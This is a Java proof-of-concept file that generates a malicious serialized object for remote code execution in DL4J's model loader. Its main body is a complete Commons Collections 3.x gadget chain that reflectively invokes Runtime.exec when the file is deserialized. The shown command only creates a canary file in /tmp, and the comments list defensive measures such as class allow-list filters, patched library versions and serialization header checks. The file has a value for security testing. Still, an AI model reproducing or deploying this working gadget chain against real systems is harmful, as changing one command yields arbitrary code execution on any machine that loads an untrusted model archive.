dl4j-modelserializer-rce-poc / BuildMaliciousModel.java
DL4J ModelSerializer deserialization RCE PoC (preprocessor.bin)
db9ffe9
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import java.io.*; import java.lang.reflect.*; import java.util.*;
/**
 * Writes a Java-serialized object graph to a file, for testing whether a consumer
 * that calls {@code ObjectInputStream.readObject()} on that file runs attacker-chosen code.
 *
 * <p>The graph is built only from Apache Commons Collections 3.x classes
 * ({@code LazyMap}, {@code TiedMapEntry}, {@code ChainedTransformer},
 * {@code InvokerTransformer}) plus {@code java.util.HashMap}. It therefore has an
 * effect only when the deserializing JVM has those functor classes on its classpath
 * and accepts them from the stream.
 *
 * <p>Defensive notes for the consuming side:
 * <ul>
 *   <li>Install an {@code ObjectInputFilter} (Java 9+, back-ported as
 *       {@code jdk.serialFilter}) that allow-lists the expected classes before any
 *       {@code readObject()} call on data taken from a model archive.</li>
 *   <li>Commons Collections 3.2.2 and later refuse to (de)serialize the unsafe functor
 *       classes such as {@code InvokerTransformer} unless explicitly re-enabled.</li>
 *   <li>Java serialization streams start with the bytes {@code AC ED 00 05}; an archive
 *       entry that begins with them can be flagged before it is loaded.</li>
 * </ul>
 *
 * <p>NOTE(review): the page header names this file {@code BuildMaliciousModel.java}, but the
 * public class is {@code GadgetGen3}; javac requires the two to match, so the file has to be
 * saved as {@code GadgetGen3.java} (or the class renamed) to compile.
 */
public class GadgetGen3 {
/**
 * Builds the object graph and writes its serialized form to the path in {@code a[0]}.
 *
 * @param a command-line arguments; {@code a[0]} is the output file path. It is read without
 *          a length check, so running with no arguments throws
 *          {@code ArrayIndexOutOfBoundsException}.
 * @throws Exception on reflection or I/O failure
 */
public static void main(String[] a) throws Exception {
// The embedded command only creates a marker file; its presence after a load is the
// evidence that deserialization reached Runtime.exec.
String out=a[0]; String[] cmd={"touch","/tmp/DL4J_RCE_CANARY"};
// Transformer sequence that, when evaluated, reflectively resolves
// Runtime.getRuntime() and calls exec(cmd) on the result.
Transformer[] t={ new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,new Object[0]}),
new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{cmd}) };
Transformer chain=new ChainedTransformer(t);
// The LazyMap starts with a harmless constant factory, so the map.put() below
// (which hashes the entry and thereby queries the LazyMap) does not run the chain
// on the machine that generates the file.
Map lazyMap=LazyMap.decorate(new HashMap(), new ConstantTransformer(1));
TiedMapEntry entry=new TiedMapEntry(lazyMap,"foo");
HashMap<Object,Object> map=new HashMap<>(); map.put(entry,"bar");
// The put() above cached a value for "foo" in the LazyMap; remove it so the key is
// absent again in the serialized state. Statement order here is significant.
lazyMap.remove("foo");
// Swap the private 'factory' field to the real chain via reflection, after construction.
Field f=LazyMap.class.getDeclaredField("factory"); f.setAccessible(true); f.set(lazyMap, chain);
// Serialize the outer HashMap into memory. The ObjectOutputStream is never closed or
// explicitly flushed; the bytes are taken straight from the backing buffer.
ByteArrayOutputStream b=new ByteArrayOutputStream(); new ObjectOutputStream(b).writeObject(map);
java.nio.file.Files.write(new File(out).toPath(), b.toByteArray());
// "cc3" presumably refers to Commons Collections 3.x — not stated elsewhere on the page.
System.out.println("cc3 gadget written ("+b.size()+" bytes)");
}
}